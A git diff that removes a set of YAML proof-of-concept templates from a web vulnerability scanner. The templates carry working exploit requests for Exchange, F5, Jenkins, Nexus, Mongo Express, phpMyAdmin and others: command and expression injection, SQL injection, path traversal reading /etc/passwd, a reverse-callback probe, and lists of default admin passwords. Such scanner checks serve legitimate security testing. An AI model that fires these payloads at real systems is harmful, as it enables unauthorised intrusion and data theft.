index 97a1da6..0000000
--- a/WebScan/pocs/exchange-cve-2021-26855-ssrf.yml
+++ /dev/null
@@ -1,14 +0,0 @@
-name: poc-yaml-exchange-cve-2021-26855-ssrf
-rules:
- - method: GET
- path: /owa/auth/x.js
- headers:
- Cookie: X-AnonResource=true; X-AnonResource-Backend=localhost/ecp/default.flt?~3; X-BEResource=localhost/owa/auth/logon.aspx?~3;
- follow_redirects: false
- expression: |
- "X-CalculatedBETarget" in response.headers && response.headers["X-CalculatedBETarget"].icontains("localhost")
-detail:
- author: sharecast
- Affected Version: "Exchange 2013 Versions < 15.00.1497.012, Exchange 2016 CU18 < 15.01.2106.013, Exchange 2016 CU19 < 15.01.2176.009, Exchange 2019 CU7 < 15.02.0721.013, Exchange 2019 CU8 < 15.02.0792.010"
- links:
- - https://github.com/microsoft/CSS-Exchange/blob/main/Security/http-vuln-cve2021-26855.nse
\ No newline at end of file
diff --git a/WebScan/pocs/eyou-rce.yml b/WebScan/pocs/eyou-rce.yml
deleted file mode 100644
index 3e6bfcc..0000000
--- a/WebScan/pocs/eyou-rce.yml
+++ /dev/null
@@ -1,15 +0,0 @@
-name: poc-yaml-eyou-rce
-set:
- r1: randomInt(800000000, 1000000000)
- r2: randomInt(800000000, 1000000000)
-rules:
- - method: POST
- path: /webadm/?q=moni_detail.do&action=gragh
- headers:
- Content-Type: application/x-www-form-urlencoded
- body: type='|expr {{r1}} + {{r2}}||'
- expression: response.body.bcontains(bytes(string(r1 + r2)))
-detail:
- author: jingling(https://github.com/shmilylty)
- links:
- - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
\ No newline at end of file
diff --git a/WebScan/pocs/f5-tmui-cve-2020-5902-rce.yml b/WebScan/pocs/f5-tmui-cve-2020-5902-rce.yml
deleted file mode 100644
index 100a2ad..0000000
--- a/WebScan/pocs/f5-tmui-cve-2020-5902-rce.yml
+++ /dev/null
@@ -1,16 +0,0 @@
-name: poc-yaml-f5-tmui-cve-2020-5902-rce
-rules:
- - method: POST
- path: >-
- /tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp
- headers:
- Content-Type: application/x-www-form-urlencoded
- body: fileName=%2Fetc%2Ff5-release
- follow_redirects: true
- expression: |
- response.status == 200 && response.body.bcontains(b"BIG-IP release")
-detail:
- author: Jing Ling
- links:
- - https://support.f5.com/csp/article/K52145254
- - https://github.com/rapid7/metasploit-framework/pull/13807/files
diff --git a/WebScan/pocs/fangweicms-sqli.yml b/WebScan/pocs/fangweicms-sqli.yml
deleted file mode 100644
index a9df0f1..0000000
--- a/WebScan/pocs/fangweicms-sqli.yml
+++ /dev/null
@@ -1,13 +0,0 @@
-name: poc-yaml-fangweicms-sqli
-set:
- rand: randomInt(200000000, 210000000)
-rules:
- - method: GET
- path: /index.php?m=Goods&a=showcate&id=103%20UNION%20ALL%20SELECT%20CONCAT%28md5({{rand}})%29%23
- expression: |
- response.body.bcontains(bytes(md5(string(rand))))
-detail:
- author: Rexus
- Affected Version: "4.3"
- links:
- - http://www.wujunjie.net/index.php/2015/08/02/%E6%96%B9%E7%BB%B4%E5%9B%A2%E8%B4%AD4-3%E6%9C%80%E6%96%B0%E7%89%88sql%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E/
diff --git a/WebScan/pocs/finereport-v8-arbitrary-file-read.yml b/WebScan/pocs/finereport-v8-arbitrary-file-read.yml
deleted file mode 100644
index 7cd9f41..0000000
--- a/WebScan/pocs/finereport-v8-arbitrary-file-read.yml
+++ /dev/null
@@ -1,11 +0,0 @@
-name: poc-yaml-finereport-v8-arbitrary-file-read
-rules:
- - method: GET
- path: /WebReport/ReportServer?op=chart&cmd=get_geo_json&resourcepath=privilege.xml
- follow_redirects: false
- expression: |
- response.status == 200 && response.body.bcontains(b"rootManagerName") && response.body.bcontains(b"CDATA")
-detail:
- author: Facker007(https://github.com/Facker007)
- links:
- - http://wiki.peiqi.tech/PeiQi_Wiki/OA%E4%BA%A7%E5%93%81%E6%BC%8F%E6%B4%9E/%E5%B8%86%E8%BD%AFOA/%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8%20v8.0%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E%20CNVD-2018-04757.html?h=%E5%B8%86%E8%BD%AF%E6%8A%A5%E8%A1%A8
diff --git a/WebScan/pocs/flir-ax8-file-read.yml b/WebScan/pocs/flir-ax8-file-read.yml
deleted file mode 100644
index 6a77cc7..0000000
--- a/WebScan/pocs/flir-ax8-file-read.yml
+++ /dev/null
@@ -1,11 +0,0 @@
-name: poc-yaml-flir-ax8-file-read
-rules:
- - method: GET
- path: "/download.php?file=/etc/passwd"
- follow_redirects: false
- expression: |
- response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
-detail:
- author: Print1n(http://print1n.top)
- links:
- - https://juejin.cn/post/6961370156484263972
\ No newline at end of file
diff --git a/WebScan/pocs/gitlab-cnvd-2021-14193-infoleak.yml b/WebScan/pocs/gitlab-cnvd-2021-14193-infoleak.yml
deleted file mode 100644
index 8fe94ce..0000000
--- a/WebScan/pocs/gitlab-cnvd-2021-14193-infoleak.yml
+++ /dev/null
@@ -1,15 +0,0 @@
-name: poc-yaml-gitlab-cnvd-2021-14193-infoleak
-rules:
- - method: POST
- path: /api/graphql
- headers:
- Content-Type: application/json
- body: >-
- {"query":"{\nusers {\nedges {\n node {\n username\n email\n avatarUrl\n status {\n emoji\n message\n messageHtml\n }\n }\n }\n }\n }","variables":null,"operationName":null}
- follow_redirects: false
- expression: response.status == 200 && response.content_type.icontains("application/json") && response.body.bcontains(bytes("avatarUrl"))
-detail:
- author: 说书人(http://python.vin/)
- links:
- - https://www.cnvd.org.cn/flaw/show/CNVD-2021-14193
- - https://gitlab.com/gitlab-org/gitlab/-/issues/244275
\ No newline at end of file
diff --git a/WebScan/pocs/h3c-secparh-any-user-login.yml b/WebScan/pocs/h3c-secparh-any-user-login.yml
deleted file mode 100644
index d9f265f..0000000
--- a/WebScan/pocs/h3c-secparh-any-user-login.yml
+++ /dev/null
@@ -1,10 +0,0 @@
-name: poc-yaml-h3c-secparh-any-user-login
-rules:
- - method: GET
- path: "/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=admin"
- expression: |
- response.status == 200 && ("错误的id".bmatches(response.body) || "审计管理员".bmatches(response.body))
-detail:
- author: Print1n(https://print1n.top)
- links:
- - https://www.pwnwiki.org/index.php?title=H3C_SecParh%E5%A0%A1%E5%A3%98%E6%A9%9F_get_detail_view.php_%E4%BB%BB%E6%84%8F%E7%94%A8%E6%88%B6%E7%99%BB%E9%8C%84%E6%BC%8F%E6%B4%9E
\ No newline at end of file
diff --git a/WebScan/pocs/hikvision-cve-2017-7921.yml b/WebScan/pocs/hikvision-cve-2017-7921.yml
deleted file mode 100644
index 78e8440..0000000
--- a/WebScan/pocs/hikvision-cve-2017-7921.yml
+++ /dev/null
@@ -1,11 +0,0 @@
-name: poc-yaml-hikvision-cve-2017-7921
-rules:
- - method: GET
- path: /system/deviceInfo?auth=YWRtaW46MTEK
- follow_redirects: false
- expression: |
- response.status == 200 && response.body.bcontains(b"") && response.headers["content-type"] == "application/xml"
-detail:
- author: whwlsfb(https://github.com/whwlsfb)
- links:
- - https://packetstormsecurity.com/files/144097/Hikvision-IP-Camera-Access-Bypass.html
\ No newline at end of file
diff --git a/WebScan/pocs/iis6.0-put.yml b/WebScan/pocs/iis6.0-put.yml
deleted file mode 100644
index de6c485..0000000
--- a/WebScan/pocs/iis6.0-put.yml
+++ /dev/null
@@ -1,21 +0,0 @@
-name: poc-yaml-iis-put-getshell
-set:
- filename: randomLowercase(6)
- fileContent: randomLowercase(6)
-
-rules:
- - method: PUT
- path: /{{filename}}.txt
- body: |
- {{fileContent}}
- expression: |
- response.status == 201
- - method: GET
- path: /{{filename}}.txt
- follow_redirects: false
- expression: |
- response.status == 200 && response.body.bcontains(bytes(fileContent))
-detail:
- author: Cannae(github.com/thunderbarca)
- links:
- - https://www.cnblogs.com/-mo-/p/11295400.html
\ No newline at end of file
diff --git a/WebScan/pocs/jboss-cve-2010-1871.yml b/WebScan/pocs/jboss-cve-2010-1871.yml
deleted file mode 100644
index c691a25..0000000
--- a/WebScan/pocs/jboss-cve-2010-1871.yml
+++ /dev/null
@@ -1,15 +0,0 @@
-name: poc-yaml-jboss-cve-2010-1871
-set:
- r1: randomInt(8000000, 10000000)
- r2: randomInt(8000000, 10000000)
-rules:
- - method: GET
- path: /admin-console/index.seam?actionOutcome=/pwn.xhtml%3fpwned%3d%23%7b{{r1}}*{{r2}}%7d
- follow_redirects: false
- expression: |
- response.status == 302 && response.headers["location"].contains(string(r1 * r2))
-detail:
- author: fuping
- links:
- - http://blog.o0o.nu/2010/07/cve-2010-1871-jboss-seam-framework.html
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1871
\ No newline at end of file
diff --git a/WebScan/pocs/jboss-unauth.yml b/WebScan/pocs/jboss-unauth.yml
deleted file mode 100644
index 5fbe218..0000000
--- a/WebScan/pocs/jboss-unauth.yml
+++ /dev/null
@@ -1,11 +0,0 @@
-name: poc-yaml-jboss-unauth
-rules:
- - method: GET
- path: /jmx-console/
- follow_redirects: false
- expression: |
- response.status == 200 && response.body.bcontains(b"jboss.management.local") && response.body.bcontains(b"jboss.web")
-detail:
- author: FiveAourThe(https://github.com/FiveAourThe)
- links:
- - https://xz.aliyun.com/t/6103
\ No newline at end of file
diff --git a/WebScan/pocs/jenkins-cve-2018-1000861-rce.yml b/WebScan/pocs/jenkins-cve-2018-1000861-rce.yml
deleted file mode 100644
index 1eb3e2b..0000000
--- a/WebScan/pocs/jenkins-cve-2018-1000861-rce.yml
+++ /dev/null
@@ -1,14 +0,0 @@
-name: poc-yaml-jenkins-cve-2018-1000861-rce
-set:
- rand: randomLowercase(4)
-rules:
- - method: GET
- path: >-
- /securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.workflow.cps.CpsFlowDefinition/checkScriptCompile?value=@GrabConfig(disableChecksums=true)%0a@GrabResolver(name=%27test%27,%20root=%27http://aaa%27)%0a@Grab(group=%27package%27,%20module=%27{{rand}}%27,%20version=%271%27)%0aimport%20Payload;
- follow_redirects: false
- expression: >-
- response.status == 200 && response.body.bcontains(bytes("package#" + rand))
-detail:
- author: p0wd3r
- links:
- - https://github.com/vulhub/vulhub/tree/master/jenkins/CVE-2018-1000861
diff --git a/WebScan/pocs/jenkins-unauthorized-access.yml b/WebScan/pocs/jenkins-unauthorized-access.yml
deleted file mode 100644
index dabe88b..0000000
--- a/WebScan/pocs/jenkins-unauthorized-access.yml
+++ /dev/null
@@ -1,21 +0,0 @@
-name: poc-yaml-jenkins-unauthorized-access
-set:
- r1: randomInt(1000, 9999)
- r2: randomInt(1000, 9999)
-rules:
- - method: GET
- path: /script
- follow_redirects: false
- expression: response.status == 200
- search: |
- "Jenkins-Crumb", "(?P.+?)"\);
- - method: POST
- path: /script
- body: |
- script=printf%28%27{{r1}}%25%25{{r2}}%27%29%3B&Jenkins-Crumb={{var}}&Submit=%E8%BF%90%E8%A1%8C
- expression: response.status == 200 && response.body.bcontains(bytes(string(r1) + "%" + string(r2)))
-detail:
- author: MrP01ntSun(https://github.com/MrPointSun)
- links:
- - https://www.cnblogs.com/yuzly/p/11255609.html
- - https://blog.51cto.com/13770310/2156663
diff --git a/WebScan/pocs/jumpserver-unauth-rce.yml b/WebScan/pocs/jumpserver-unauth-rce.yml
deleted file mode 100644
index 041832d..0000000
--- a/WebScan/pocs/jumpserver-unauth-rce.yml
+++ /dev/null
@@ -1,21 +0,0 @@
-name: poc-yaml-jumpserver-unauth-rce
-set:
- r1: randomLowercase(5)
-rules:
- - method: GET
- path: /api/v1/authentication/connection-token/
- follow_redirects: false
- expression: |
- response.status == 401 && response.content_type.contains("application/json") && response.body.bcontains(b"not_authenticated")
- - method: GET
- path: /api/v1/authentication/connection-token/?user-only={{r1}}
- follow_redirects: false
- expression: |
- response.status == 404 && response.content_type.contains("application/json") && response.body.bcontains(b"\"\"")
-detail:
- author: mvhz81
- info: jumpserver unauth read logfile + jumpserver rce
- links:
- - https://s.tencent.com/research/bsafe/1228.html
- - https://mp.weixin.qq.com/s/KGRU47o7JtbgOC9xwLJARw
- - https://github.com/jumpserver/jumpserver/releases/download/v2.6.2/jms_bug_check.sh
diff --git a/WebScan/pocs/jumpserver-unauth-rce2.yml b/WebScan/pocs/jumpserver-unauth-rce2.yml
deleted file mode 100644
index 353329d..0000000
--- a/WebScan/pocs/jumpserver-unauth-rce2.yml
+++ /dev/null
@@ -1,21 +0,0 @@
-name: poc-yaml-jumpserver-unauth-rce
-set:
- r1: randomLowercase(5)
-rules:
- - method: GET
- path: /api/v1/users/connection-token/
- follow_redirects: false
- expression: |
- response.status == 401 && response.content_type.contains("application/json") && response.body.bcontains(b"not_authenticated")
- - method: GET
- path: /api/v1/users/connection-token/?user-only={{r1}}
- follow_redirects: false
- expression: |
- response.status == 404 && response.content_type.contains("application/json") && response.body.bcontains(b"\"\"")
-detail:
- author: mvhz81
- info: jumpserver unauth read logfile + jumpserver rce
- links:
- - https://s.tencent.com/research/bsafe/1228.html
- - https://mp.weixin.qq.com/s/KGRU47o7JtbgOC9xwLJARw
- - https://github.com/jumpserver/jumpserver/releases/download/v2.6.2/jms_bug_check.sh
diff --git a/WebScan/pocs/kingsoft-v8-default-password.yml b/WebScan/pocs/kingsoft-v8-default-password.yml
deleted file mode 100644
index 6835390..0000000
--- a/WebScan/pocs/kingsoft-v8-default-password.yml
+++ /dev/null
@@ -1,12 +0,0 @@
-name: poc-yaml-kingsoft-v8-default-password
-rules:
- - method: POST
- path: /inter/ajax.php?cmd=get_user_login_cmd
- body: "{\"get_user_login_cmd\":{\"name\":\"admin\",\"password\":\"21232f297a57a5a743894a0e4a801fc3\"}}"
- follow_redirects: true
- expression: |
- response.status == 200 && response.body.bcontains(b"ADMIN") && response.body.bcontains(b"userSession")
-detail:
- author: B1anda0(https://github.com/B1anda0)
- links:
- - https://idc.wanyunshuju.com/aqld/2123.html
\ No newline at end of file
diff --git a/WebScan/pocs/kingsoft-v8-file-read.yml b/WebScan/pocs/kingsoft-v8-file-read.yml
deleted file mode 100644
index 02b3eb0..0000000
--- a/WebScan/pocs/kingsoft-v8-file-read.yml
+++ /dev/null
@@ -1,12 +0,0 @@
-name: poc-yaml-kingsoft-v8-file-read
-rules:
- - method: GET
- path: >-
- /htmltopdf/downfile.php?filename=/windows/win.ini
- follow_redirects: false
- expression: |
- response.status == 200 && (response.body.bcontains(b"for 16-bit app support") || response.body.bcontains(b"[extensions]")) && response.headers["Content-Type"].contains("application/zip")
-detail:
- author: kzaopa(https://github.com/kzaopa)
- links:
- - https://github.com/PeiQi0/PeiQi-WIKI-POC/blob/b6f8fbfef46ad1c3f8d5715dd19b00ca875341c2/_book/PeiQi_Wiki/Web%E5%BA%94%E7%94%A8%E6%BC%8F%E6%B4%9E/%E9%87%91%E5%B1%B1/%E9%87%91%E5%B1%B1%20V8%20%E7%BB%88%E7%AB%AF%E5%AE%89%E5%85%A8%E7%B3%BB%E7%BB%9F%20%E4%BB%BB%E6%84%8F%E6%96%87%E4%BB%B6%E8%AF%BB%E5%8F%96%E6%BC%8F%E6%B4%9E.md
diff --git a/WebScan/pocs/landray-oa-custom-jsp-fileread-2.yml b/WebScan/pocs/landray-oa-custom-jsp-fileread-2.yml
deleted file mode 100644
index f7d39e7..0000000
--- a/WebScan/pocs/landray-oa-custom-jsp-fileread-2.yml
+++ /dev/null
@@ -1,11 +0,0 @@
-name: poc-yaml-landray-oa-custom-jsp-fileread
-rules:
- - method: POST
- path: /sys/ui/extend/varkind/custom.jsp
- body: var={"body":{"file":"file:///c://windows/win.ini"}}
- expression: |
- response.status == 200 && response.body.bcontains(b"for 16-bit app support")
-detail:
- author: B1anda0(https://github.com/B1anda0)
- links:
- - https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
\ No newline at end of file
diff --git a/WebScan/pocs/landray-oa-custom-jsp-fileread.yml b/WebScan/pocs/landray-oa-custom-jsp-fileread.yml
deleted file mode 100644
index e513a88..0000000
--- a/WebScan/pocs/landray-oa-custom-jsp-fileread.yml
+++ /dev/null
@@ -1,11 +0,0 @@
-name: poc-yaml-landray-oa-custom-jsp-fileread
-rules:
- - method: POST
- path: /sys/ui/extend/varkind/custom.jsp
- body: var={"body":{"file":"file:///etc/passwd"}}
- expression: |
- response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
-detail:
- author: B1anda0(https://github.com/B1anda0)
- links:
- - https://mp.weixin.qq.com/s/TkUZXKgfEOVqoHKBr3kNdw
\ No newline at end of file
diff --git a/WebScan/pocs/lanproxy-cve-2021-3019-lfi.yml b/WebScan/pocs/lanproxy-cve-2021-3019-lfi.yml
deleted file mode 100644
index b4c8a72..0000000
--- a/WebScan/pocs/lanproxy-cve-2021-3019-lfi.yml
+++ /dev/null
@@ -1,12 +0,0 @@
-name: poc-yaml-lanproxy-cve-2021-3019-lfi
-rules:
- - method: GET
- path: "/../conf/config.properties"
- expression: |
- response.status == 200 && response.body.bcontains(bytes(string(b"config.admin.username"))) && response.body.bcontains(bytes(string(b"config.admin.password"))) && response.content_type.contains("application/octet-stream")
-detail:
- author: pa55w0rd(www.pa55w0rd.online/)
- Affected Version: "lanproxy 0.1"
- links:
- - https://github.com/ffay/lanproxy/issues/152
- - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3019
diff --git a/WebScan/pocs/laravel-debug-info-leak.yml b/WebScan/pocs/laravel-debug-info-leak.yml
deleted file mode 100644
index aa5610e..0000000
--- a/WebScan/pocs/laravel-debug-info-leak.yml
+++ /dev/null
@@ -1,11 +0,0 @@
-name: poc-yaml-laravel-debug-info-leak
-rules:
- - method: POST
- path: /
- follow_redirects: false
- expression: >
- response.status == 405 && response.body.bcontains(b"MethodNotAllowedHttpException") && response.body.bcontains(b"Environment & details") && (response.body.bcontains(b"vendor\\laravel\\framework\\src\\Illuminate\\Routing\\RouteCollection.php") || response.body.bcontains(b"vendor/laravel/framework/src/Illuminate/Routing/RouteCollection.php"))
-detail:
- author: Dem0ns (https://github.com/dem0ns)
- links:
- - https://github.com/dem0ns/improper/tree/master/laravel/5_debug
diff --git a/WebScan/pocs/laravel-improper-webdir.yml b/WebScan/pocs/laravel-improper-webdir.yml
deleted file mode 100644
index d1db0b5..0000000
--- a/WebScan/pocs/laravel-improper-webdir.yml
+++ /dev/null
@@ -1,11 +0,0 @@
-name: poc-yaml-laravel-improper-webdir
-rules:
- - method: GET
- path: /storage/logs/laravel.log
- follow_redirects: false
- expression: >
- response.status == 200 && (response.content_type.contains("plain") || response.content_type.contains("octet-stream")) && (response.body.bcontains(b"vendor\\laravel\\framework") || response.body.bcontains(b"vendor/laravel/framework")) && (response.body.bcontains(b"stacktrace") || response.body.bcontains(b"Stack trace"))
-detail:
- author: Dem0ns (https://github.com/dem0ns)
- links:
- - https://github.com/dem0ns/improper
diff --git a/WebScan/pocs/mongo-express-cve-2019-10758.yml b/WebScan/pocs/mongo-express-cve-2019-10758.yml
deleted file mode 100644
index 6d64293..0000000
--- a/WebScan/pocs/mongo-express-cve-2019-10758.yml
+++ /dev/null
@@ -1,21 +0,0 @@
-name: poc-yaml-mongo-express-cve-2019-10758
-set:
- reverse: newReverse()
- reverseURL: reverse.url
-rules:
- - method: POST
- path: /checkValid
- headers:
- Authorization: Basic YWRtaW46cGFzcw==
- body: >-
- document=this.constructor.constructor('return process')().mainModule.require('http').get('{{reverseURL}}')
- follow_redirects: true
- expression: >
- reverse.wait(5)
-detail:
- vulnpath: '/checkValid'
- author: fnmsd(https://github.com/fnmsd)
- description: 'Mongo Express CVE-2019-10758 Code Execution'
- links:
- - https://github.com/masahiro331/CVE-2019-10758
- - https://www.twilio.com/blog/2017/08/http-requests-in-node-js.html
\ No newline at end of file
diff --git a/WebScan/pocs/netentsec-ngfw-rce.yml b/WebScan/pocs/netentsec-ngfw-rce.yml
deleted file mode 100644
index bff8b28..0000000
--- a/WebScan/pocs/netentsec-ngfw-rce.yml
+++ /dev/null
@@ -1,19 +0,0 @@
-name: poc-yaml-netentsec-ngfw-rce
-set:
- r1: randomLowercase(4)
- r2: randomLowercase(4)
- r3: randomInt(800000000, 1000000000)
- r4: randomInt(800000000, 1000000000)
-rules:
- - method: POST
- path: /directdata/direct/router
- body: >-
- {"action":"SSLVPN_Resource", "method":"deleteImage", "data":[{"data":["/var/www/html/{{r1}};expr {{r3}} + {{r4}} > /var/www/html/{{r2}}"]}], "type":"rpc", "tid":17, "f8839p7rqtj":"="}
- expression: response.status == 200
- - method: GET
- path: /{{r2}}
- expression: response.status == 200 && response.body.bcontains(bytes(string(r3 + r4)))
-detail:
- author: jingling(https://github.com/shmilylty)
- links:
- - https://mp.weixin.qq.com/s/wH5luLISE_G381W2ssv93g
\ No newline at end of file
diff --git a/WebScan/pocs/nexus-cve-2019-7238.yml b/WebScan/pocs/nexus-cve-2019-7238.yml
deleted file mode 100644
index 69d5bc4..0000000
--- a/WebScan/pocs/nexus-cve-2019-7238.yml
+++ /dev/null
@@ -1,20 +0,0 @@
-name: poc-yaml-nexus-cve-2019-7238
-set:
- r1: randomInt(800000000, 1000000000)
- r2: randomInt(800000000, 1000000000)
-rules:
- - method: POST
- path: "/service/extdirect"
- headers:
- Content-Type: application/json
- body: |
- {"action": "coreui_Component", "type": "rpc", "tid": 8, "data": [{"sort": [{"direction": "ASC", "property": "name"}], "start": 0, "filter": [{"property": "repositoryName", "value": "*"}, {"property": "expression", "value": "function(x, y, z, c, integer, defineClass){ c=1.class.forName('java.lang.Character'); integer=1.class; x='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'; y=0; z=''; while (y lt x.length()){ z += c.toChars(integer.parseInt(x.substring(y, y+2), 16))[0]; y += 2; };defineClass=2.class.forName('java.lang.Thread');x=defineClass.getDeclaredMethod('currentThread').invoke(null);y=defineClass.getDeclaredMethod('getContextClassLoader').invoke(x);defineClass=2.class.forName('java.lang.ClassLoader').getDeclaredMethod('defineClass','1'.class,1.class.forName('[B'),1.class.forName('[I').getComponentType(),1.class.forName('[I').getComponentType()); \ndefineClass.setAccessible(true);\nx=defineClass.invoke(\n y,\n 'Exploit.Test234',\n z.getBytes('latin1'), 0,\n 3054\n);x.getMethod('test', ''.class).invoke(null, 'expr {{r1}} + {{r2}}');'done!'}\n"}, {"property": "type", "value": "jexl"}], "limit": 50, "page": 1}], "method": "previewAssets"}
- expression: |
- response.status == 200 && response.body.bcontains(bytes(string(r1 + r2)))
-detail:
- Affected Version: "nexus<3.15"
- author: hanxiansheng26(https://github.com/hanxiansheng26)
- links:
- - https://github.com/jas502n/CVE-2019-7238
- - https://github.com/verctor/nexus_rce_CVE-2019-7238
- - https://github.com/vulhub/vulhub/tree/master/nexus/CVE-2019-7238
diff --git a/WebScan/pocs/nexus-cve-2020-10199.yml b/WebScan/pocs/nexus-cve-2020-10199.yml
deleted file mode 100644
index 7ce9fa7..0000000
--- a/WebScan/pocs/nexus-cve-2020-10199.yml
+++ /dev/null
@@ -1,21 +0,0 @@
-name: poc-yaml-nexus-cve-2020-10199
-set:
- r1: randomInt(40000, 44800)
- r2: randomInt(40000, 44800)
-rules:
- - method: POST
- path: "/rest/beta/repositories/go/group"
- headers:
- Content-Type: application/json
- body: |
- {"name": "internal","online": true,"storage": {"blobStoreName": "default","strictContentTypeValidation": true},"group": {"memberNames": ["$\\c{ {{r1}} * {{r2}} }"]}}
- expression: |
- response.status == 400 && response.body.bcontains(bytes(string(r1 * r2)))
-detail:
- Affected Version: "nexus<3.21.2"
- author: kingkk(https://www.kingkk.com/)
- links:
- - https://cert.360.cn/report/detail?id=b3eaa020cf5c0e9e92136041e4d713bb
- - https://www.cnblogs.com/magic-zero/p/12641068.html
- - https://securitylab.github.com/advisories/GHSL-2020-011-nxrm-sonatype
- - https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
diff --git a/WebScan/pocs/nexus-cve-2020-10204.yml b/WebScan/pocs/nexus-cve-2020-10204.yml
deleted file mode 100644
index a08a2bb..0000000
--- a/WebScan/pocs/nexus-cve-2020-10204.yml
+++ /dev/null
@@ -1,20 +0,0 @@
-name: poc-yaml-nexus-cve-2020-10204
-set:
- r1: randomInt(40000, 44800)
- r2: randomInt(40000, 44800)
-rules:
- - method: POST
- path: "/extdirect"
- headers:
- Content-Type: application/json
- body: |
- {"action":"coreui_User","method":"update","data":[{"userId":"anonymous","version":"1","firstName":"Anonymous","lastName":"User2","email":"anonymous@example.org","status":"active","roles":["$\\c{{{r1}}*{{r2}}}"]}],"type":"rpc","tid":28}
- expression: |
- response.status == 200 && response.body.bcontains(bytes(string(r1 * r2)))
-detail:
- Affected Version: "nexus<3.21.2"
- author: kingkk(https://www.kingkk.com/)
- links:
- - https://cert.360.cn/report/detail?id=b3eaa020cf5c0e9e92136041e4d713bb
- - https://www.cnblogs.com/magic-zero/p/12641068.html
- - https://support.sonatype.com/hc/en-us/articles/360044882533-CVE-2020-10199-Nexus-Repository-Manager-3-Remote-Code-Execution-2020-03-31
diff --git a/WebScan/pocs/nexus-default-password.yml b/WebScan/pocs/nexus-default-password.yml
deleted file mode 100644
index 5a27c24..0000000
--- a/WebScan/pocs/nexus-default-password.yml
+++ /dev/null
@@ -1,22 +0,0 @@
-name: poc-yaml-nexus-default-password
-rules:
- - method: GET
- path: /nexus/service/siesta/capabilities
- expression: >
- response.status == 401
- - method: GET
- path: /nexus/service/local/authentication/login
- headers:
- Accept: application/json
- Authorization: Basic YWRtaW46YWRtaW4xMjM=
- expression: >
- response.status == 200
- - method: GET
- path: /nexus/service/siesta/capabilities
- expression: >
- response.status == 200
-detail:
- author: Soveless(https://github.com/Soveless)
- Affected Version: "Nexus Repository Manager OSS"
- links:
- - https://help.sonatype.com/learning/repository-manager-3/first-time-installation-and-setup/lesson-1%3A--installing-and-starting-nexus-repository-manager
\ No newline at end of file
diff --git a/WebScan/pocs/phpmyadmin-cve-2018-12613-file-inclusion.yml b/WebScan/pocs/phpmyadmin-cve-2018-12613-file-inclusion.yml
deleted file mode 100644
index 20a73c0..0000000
--- a/WebScan/pocs/phpmyadmin-cve-2018-12613-file-inclusion.yml
+++ /dev/null
@@ -1,11 +0,0 @@
-name: poc-yaml-phpmyadmin-cve-2018-12613-file-inclusion
-rules:
- - method: GET
- path: /index.php?target=db_sql.php%253f/../../../../../../../../etc/passwd
- follow_redirects: false
- expression: >-
- response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
-detail:
- author: p0wd3r
- links:
- - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/CVE-2018-12613
diff --git a/WebScan/pocs/phpmyadmin-setup-deserialization.yml b/WebScan/pocs/phpmyadmin-setup-deserialization.yml
deleted file mode 100644
index 7bf691e..0000000
--- a/WebScan/pocs/phpmyadmin-setup-deserialization.yml
+++ /dev/null
@@ -1,13 +0,0 @@
-name: poc-yaml-phpmyadmin-setup-deserialization
-rules:
- - method: POST
- path: /scripts/setup.php
- body: >-
- action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
- follow_redirects: false
- expression: >-
- response.status == 200 && "root:[x*]:0:0:".bmatches(response.body)
-detail:
- author: p0wd3r
- links:
- - https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
diff --git a/WebScan/pocs/phpstudy-backdoor-rce.yml b/WebScan/pocs/phpstudy-backdoor-rce.yml
deleted file mode 100644
index a8bb748..0000000
--- a/WebScan/pocs/phpstudy-backdoor-rce.yml
+++ /dev/null
@@ -1,19 +0,0 @@
-name: poc-yaml-phpstudy-backdoor-rce
-set:
- r: randomLowercase(6)
- payload: base64("printf(md5('" + r + "'));")
-rules:
- - method: GET
- path: /index.php
- headers:
- Accept-Encoding: 'gzip,deflate'
- Accept-Charset: '{{payload}}'
- follow_redirects: false
- expression: |
- response.body.bcontains(bytes(md5(r)))
-detail:
- author: 17bdw
- Affected Version: "phpstudy 2016-phpstudy 2018 php 5.2 php 5.4"
- vuln_url: "php_xmlrpc.dll"
- links:
- - https://www.freebuf.com/column/214946.html
\ No newline at end of file
diff --git a/WebScan/pocs/poc-yaml-weblogic-console-weak.yml b/WebScan/pocs/poc-yaml-weblogic-console-weak.yml
deleted file mode 100644
index 99b5151..0000000
--- a/WebScan/pocs/poc-yaml-weblogic-console-weak.yml
+++ /dev/null
@@ -1,29 +0,0 @@
-name: poc-yaml-weblogic-console-weak
-sets:
- username:
- - weblogic
- password:
- - weblogic
- - weblogic1
- - welcome1
- - Oracle@123
- - weblogic123
- payload:
- - UTF-8
-rules:
- - method: HEAD
- path: /console/j_security_check
- follow_redirects: false
- expression: |
- response.status == 302 && response.headers['Set-Cookie'].contains("ADMINCONSOLESESSION")
- - method: POST
- path: /console/j_security_check
- follow_redirects: false
- headers:
- Content-type: application/x-www-form-urlencoded
- body: |
- j_username={{username}}&j_password={{password}}&j_character_encoding={{payload}}
- expression: |
- !response.body.bcontains(b"LoginForm.jsp")
-detail:
- author: shadown1ng(https://github.com/shadown1ng)
\ No newline at end of file
